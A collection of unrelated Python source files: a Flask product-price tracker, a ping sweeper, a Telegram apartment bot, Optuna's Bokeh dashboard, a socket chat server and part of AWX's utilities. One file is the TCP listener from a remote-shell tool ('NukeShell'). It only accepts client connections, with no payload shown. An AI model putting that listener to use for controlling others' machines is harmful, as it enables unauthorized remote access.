# Utility functions:
def shutdown(self):
self._exiting = True
ioloop.IOLoop.instance().stop()
def run(self):
dprint(1, "Config:", json.dumps(self._config))
dprint(1, "Starting loops...")
def heartbeat_loop():
dprint(2, "Starting loop for 'Heartbeat'...")
while not self._exiting:
dprint(3, ".", end="")
try:
zmq.device(zmq.FORWARDER, self._heartbeat_socket, self._heartbeat_socket)
except zmq.ZMQError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
hb_thread = threading.Thread(target=heartbeat_loop)
hb_thread.daemon = True
hb_thread.start()
dprint(1, "Ready! Listening...")
ioloop.IOLoop.instance().start()
|
app.py
|
# coding: utf-8
from datetime import datetime, timedelta
import json
from flask import Flask
from flask import render_template, request, session, redirect, url_for, flash
from flask_sockets import Sockets
from flask_mongoengine.pagination import Pagination
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from flask_moment import Moment
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from threading import Thread
import leancloud
from views.todos import todos_view
from search import update_item
from utils import obj_to_dict
app = Flask(__name__)
sockets = Sockets(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
app.config['SECRET_KEY'] = 'hard to guess string'
app.jinja_env.auto_reload = True
# 动态路由
app.register_blueprint(todos_view, url_prefix='/todos')
Spu = leancloud.Object.extend('Spu')
Sku = leancloud.Object.extend('Sku')
History = leancloud.Object.extend('History')
class UrlForm(FlaskForm):
url = StringField('Enter the URL:', validators=[DataRequired()])
submit = SubmitField('Submit')
class SearchForm(FlaskForm):
keyword = StringField('Keyword', validators=[DataRequired()])
submit = SubmitField('Search')
@app.route('/', methods=['GET', 'POST'])
def index():
# Pagination.
page = request.args.get('page', 1, type=int)
keyword = request.args.get('keyword')
print(keyword)
query = Spu.query.add_descending('createdAt')
if keyword:
query.contains('name', keyword)
spu_all = query.find()
pg = Pagination(spu_all, page, 20)
# Get and arrange the item data to render.
items = []
for spu_obj in pg.items:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('index.html',
form=form,
items=items,
pagination=pg,
current_time=datetime.utcnow())
@app.route('/latest', methods=['GET', 'POST'])
def latest():
# Pagination.
latest_spus = Spu.query \
.greater_than_or_equal_to('createdAt', datetime.now() - timedelta(days=2))\
.add_descending('createdAt')\
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('latest.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/update30', methods=['GET', 'POST'])
def update30():
# Pagination.
latest_spus = Spu.query \
.add_descending('updatedAt') \
.limit(30)\
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('update30.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/all', methods=['GET', 'POST'])
def all():
# Pagination.
latest_spus = Spu.query \
.add_descending('createdAt') \
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('all.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/commit', methods=['GET', 'POST'])
def commit():
# Form to input the URL.
url = None
form = UrlForm()
if form.validate_on_submit():
url = form.url.data
parse_new(url)
form.url.data = ''
return redirect(url_for('index'))
return render_template('commit.html',
form=form)
@app.route('/sku/<asin>')
def sku(asin):
sku_obj = Sku.query\
.equal_to('asin', asin)\
.include('spu')\
.first()
sku_objs = Sku.query\
.equal_to('spu', sku_obj.get('spu'))\
.add_ascending('price')\
.find()
sku = obj_to_dict(sku_obj)
skus = [obj_to_dict(obj) for obj in sku_objs]
return render_template('sku.html',
sku=sku,
skus=skus)
@app.route('/spu/<asin>')
def spu(asin):
spu_obj = Spu.query \
.equal_to('asin', asin) \
.first()
sku_objs = Sku.query\
.equal_to('spu', spu_obj)\
.add_ascending('price')\
.find()
spu = obj_to_dict(spu_obj)
skus = [obj_to_dict(obj) for obj in sku_objs]
return render_template('spu.html',
spu=spu,
skus=skus)
@app.route('/time')
def time():
return str(datetime.now())
@app.route('/item/<asin>')
def product(asin):
query = Spu.query
query.equal_to('asin', asin)
spu = query.first()
sku_objs = Sku.query\
.equal_to('spu', spu)\
.find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
return json.dumps({'spu': spu, 'skus': skus})
@app.route('/delete/<asin>')
def delete_item(asin):
'''asin:: Must be spu asin.'''
spu = Spu.query.equal_to('asin', asin).first()
skus = Sku.query.equal_to('asin', asin).find()
history_list = History.query.equal_to('asin', asin).find()
# history_list = History.query.equal_to('sku', sku).find()
objs = [spu] + skus + history_list
leancloud.Object.destroy_all(objs)
flash('{0} has been deleted.'.format(spu.get('name')))
return redirect(url_for('index'), 301)
@sockets.route('/echo')
def echo_socket(ws):
while True:
message = ws.receive()
ws.send(message)
def async_parse_new(app, url, request):
with app.app_context():
# flash('Parsing item...')
item = update_item(url)
with app.test_request_context():
flash('Ok! Parsed item: {}'.format(item.spu.get('name')))
def parse_new(url):
thr = Thread(target=async_parse_new, args=[app, url, request])
thr.start()
return thr
@app.route('/update')
def update():
asin = request.args.get('asin')
spu = Spu.query.equal_to('asin', asin).first()
return update_item(spu.get('url'))
@app.route('/test')
def test():
asin = request.args.get('asin')
spu = Spu.query.equal_to('asin', asin).first()
return json.dumps({'asin': 'asin'})
|
pythread3.py
|
#/usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread
import subprocess
from Queue import * # Queue
num_threads = 3
queue = Queue()
ips = ["10.0.0.1", "10.0.0.51"]
def pinger(i, q):
"""ping subnet"""
while True:
ip = q.get()
print "Thread %s: Pingping %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
else:
print "%s: did not respond" % ip
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
for ip in ips:
queue.put(ip)
print "Main Thread Waiting"
queue.join()
print "Done"
|
server.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author : LimerBoy
# github.com/LimerBoy/NukeShell
# Import modules
from sys import exit
from time import sleep
from colorama import Fore
from threading import Thread
from Core.clients import Client, ClientsManager
from socket import socket, \
AF_INET, SOCK_STREAM, SO_REUSEADDR, SOL_SOCKET, SHUT_RDWR
""" TCP server class """
class ServerListen:
""" Constructor """
def __init__(self, host, port):
self.host = host
self.port = port
self.ServerStopped = False
self.server = self.InitServer(host, port)
Thread(target=self.AcceptClients).start()
# Stop server
def StopServer(self):
self.ServerStopped = True
ConnectedClients = ClientsManager.GetConnectedClients()
clients = len(ConnectedClients)
print(f"\n{Fore.RED}[Server]{Fore.WHITE} Disconnecting {clients} clients ...")
# Disconnect all clients
for client in ConnectedClients:
Thread(target=client.Disconnect).start()
# Wait for all clients disconnection
# while len(ConnectedClients) != 0:
# print(len(ConnectedClients))
# sleep(0.2)
sleep(clients / 2)
# Stop tcp server
print(f"{Fore.RED}[Server]{Fore.WHITE} Stopping server ...")
self.server.shutdown(SHUT_RDWR)
self.server.close()
exit(1)
# Initialize server socket
@staticmethod
def InitServer(host="0.0.0.0", port=5125) -> socket:
# Create sockets
server = socket(
AF_INET,
SOCK_STREAM
)
# Settings
server.settimeout(50)
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# Bind socket
server.bind((host, port))
server.listen(5)
print(f"{Fore.GREEN}[Server]{Fore.WHITE} Listening at {host}:{port} ...{Fore.RESET}")
return server
# Accept all connections
def AcceptClients(self):
while True:
# Client connected
try:
connection, address = self.server.accept()
Client(connection, address)
except OSError as e:
if self.ServerStopped:
return
connection.close()
print(f"{Fore.RED}[Server]{Fore.WHITE} Failed to accept client", *address, Fore.RESET, e)
self.__init__(self.host, self.port)
break
|
client.py
|
import threading
from enum import Enum
from typing import Union, List, TYPE_CHECKING
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup, InputMediaPhoto
from telegram.ext import Updater, CallbackQueryHandler, CallbackContext
if TYPE_CHECKING:
from harbor.db.models import DbApartment, DbApartmentPhoto
ChatId = Union[str, int]
class BotAction(Enum):
Error = 'error'
Like = 'like'
Dislike = 'dislike'
class BotClient:
def __init__(self, api_token: str, main_chat_id: ChatId):
self._main_chat_id = main_chat_id
self._updater = Updater(token=api_token, use_context=True)
self._dispatcher = self._updater.dispatcher
self._dispatcher.add_handler(
CallbackQueryHandler(
self._error_decorator(self._apartment_action_callback), pattern=r'^like|^dislike'
)
)
self._dispatcher.add_error_handler(self._error_callback)
self._polling_thread = None
self._handlers = {
BotAction.Like: None,
BotAction.Dislike: None,
BotAction.Error: None
}
def start_polling(self):
"""
Start receiving events
"""
if not self._polling_thread:
self._polling_thread = threading.Thread(target=self._updater.start_polling)
self._polling_thread.start()
def idle(self):
"""
Waiting CTRL+C for exit
"""
self._updater.idle()
def stop_polling(self):
"""
Stop receiving events
"""
if self._polling_thread:
self._updater.stop()
self._polling_thread = None
def add_handler(self, action: BotAction, callback):
self._handlers[action] = callback
def post_apartment_photos(self, photos: List['DbApartmentPhoto']) -> List[int]:
media = [InputMediaPhoto(p.absolute_photo_url) for p in photos]
photo_messages = self._updater.bot.send_media_group(
chat_id=self._main_chat_id,
media=media,
timeout=20,
)
message_ids = [m.message_id for m in photo_messages]
return message_ids
def post_apartment_description(self, apartment: 'DbApartment') -> int:
star_btn = InlineKeyboardButton(
text="👍",
callback_data=f'{BotAction.Like.value};{apartment.row_id}'
)
skip_btn = InlineKeyboardButton(
text="Не интересно",
callback_data=f'{BotAction.Dislike.value};{apartment.row_id}'
)
reply_markup = InlineKeyboardMarkup(
[[star_btn, skip_btn]]
)
response = self._updater.bot.send_message(
chat_id=self._main_chat_id,
text=f'{apartment.price}\n'
f'{apartment.square} / {apartment.useful_square} / {apartment.kitchen_square} m2\n'
f'{apartment.address}\n'
f'{apartment.short_description}\n\n'
f'{apartment.absolute_url}',
reply_markup=reply_markup,
timeout=20,
)
return response.message_id
def update_apartment_message(self, message_id: int, apartment: 'DbApartment') -> int:
response = self._updater.bot.edit_message_text(
chat_id=self._main_chat_id,
message_id=message_id,
text=f'{apartment.price}\n'
f'{apartment.square} / {apartment.useful_square} / {apartment.kitchen_square} m2\n'
f'{apartment.address}\n'
f'{apartment.short_description}\n\n'
f'{apartment.absolute_url}',
reply_markup=None,
timeout=20,
)
return response.message_id
def delete_apartment_message(self, apartment: 'DbApartment'):
tel_message_ids = apartment.telegram.get_message_ids()
for m_id in tel_message_ids:
self._updater.bot.delete_message(self._main_chat_id, int(m_id), timeout=20)
def _apartment_action_callback(self, update: Update, context: CallbackContext):
query_data = update.callback_query.data # type: str
query_action, query_value = tuple(query_data.split(';'))
message_id = update.callback_query.message.message_id
query_action = BotAction(query_action)
query_value = int(query_value)
if query_action == BotAction.Like:
self._on_like_handler(message_id, query_value)
elif query_action == BotAction.Dislike:
self._on_dislike_handler(message_id, query_value)
def _error_decorator(self, callback):
def decorator(update: 'Update', context: 'CallbackContext', *args):
try:
callback(update, context)
except Exception as e:
self._on_error_handler(e)
return decorator
def _error_callback(self, update: 'Update', context: 'CallbackContext'):
self._on_error_handler(context.error)
def _on_error_handler(self, error):
callback = self._handlers.get(BotAction.Error, None)
if callback:
callback(error)
def _on_like_handler(self, message_id: int, obj_id: int):
callback = self._handlers.get(BotAction.Like, None)
if callback:
callback(message_id, obj_id)
def _on_dislike_handler(self, message_id: int, obj_id: int):
callback = self._handlers.get(BotAction.Dislike, None)
if callback:
callback(message_id, obj_id)
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
import optuna.logging
import optuna.structs
import optuna.study
from optuna import types
if types.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in
['number', 'state', 'value', 'params', 'datetime_start', 'datetime_complete']
])
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'number': [trial.number for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
server.py
|
import socket
from threading import Thread
import threading
def get_user():
while True:
conn, addr = sock.accept()
conns.append({"conn": conn, "socket": addr})
print("connected:", addr)
threading.Thread(target=receive, args=[conn]).start()
def receive(conn):
while True:
try:
data = conn.recv(4096)
message = str(data.decode("utf-8"))
print(message)
chat(conn, message)
except:
break
def chat(conn, message):
#message += "\n"
for user in conns:
if user["conn"] != conn:
user["conn"].send(message.encode())
if __name__ == "__main__":
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(10)
conns = []
threading.Thread(target=get_user).start()
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from datetime import timedelta
import json
import yaml
import logging
import os
import subprocess
import re
import stat
import subprocess
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.dateparse import parse_datetime
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db import connection
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
from django.db import connection as django_connection
from django.core.cache import cache as django_cache
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.utils.timezone import now
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400',
'camelcase_to_underscore',
'underscore_to_camelcase',
'memoize',
'memoize_delete',
'get_awx_http_client_headers',
'get_awx_version',
'update_scm_url',
'get_type_for_model',
'get_model_for_type',
'copy_model_by_class',
'copy_m2m_relationships',
'prefetch_page_capabilities',
'to_python_boolean',
'datetime_hook',
'ignore_inventory_computed_fields',
'ignore_inventory_group_removal',
'_inventory_updates',
'get_pk_from_dict',
'getattrd',
'getattr_dne',
'NoDefaultProvided',
'get_current_apps',
'set_current_apps',
'extract_ansible_vars',
'get_search_fields',
'get_system_task_capacity',
'get_cpu_capacity',
'get_mem_capacity',
'model_to_dict',
'NullablePromptPseudoField',
'model_instance_diff',
'parse_yaml_or_json',
'RequireDebugTrueOrTest',
'has_model_field_prefetched',
'set_environ',
'IllegalArgumentError',
'get_custom_venv_choices',
'get_external_account',
'task_manager_bulk_reschedule',
'schedule_task_manager',
'classproperty',
'create_temporary_fifo',
'truncate_stdout',
'deepmerge',
'get_event_partition_epoch',
'cleanup_new_process',
]
def get_object_or_400(klass, *args, **kwargs):
"""
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
"""
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def datetime_hook(d):
new_d = {}
for key, value in d.items():
try:
new_d[key] = parse_datetime(value)
except TypeError:
new_d[key] = value
return new_d
def camelcase_to_underscore(s):
"""
Convert CamelCase names to lowercase_with_underscore.
"""
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
"""
Convert lowercase_with_underscore names to CamelCase.
"""
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
"""
Logging filter to output when in DEBUG mode or running tests.
"""
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
"""
Decorator to wrap a function and cache its result.
"""
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize(ttl=3600 * 24) # in practice, we only need this to load once at process startup time
def get_event_partition_epoch():
from django.db.migrations.recorder import MigrationRecorder
return MigrationRecorder.Migration.objects.filter(app='main', name='0144_event_partitions').first().applied
@memoize()
def get_ansible_version():
"""
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
"""
try:
proc = subprocess.Popen(['ansible', '--version'], stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
def get_awx_version():
"""
Return AWX version as reported by setuptools.
"""
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format('AWX' if license == 'open' else 'Red Hat Ansible Automation Platform', get_awx_version(), license),
}
return headers
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
"""
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
"""
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
# if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
# if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
# raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
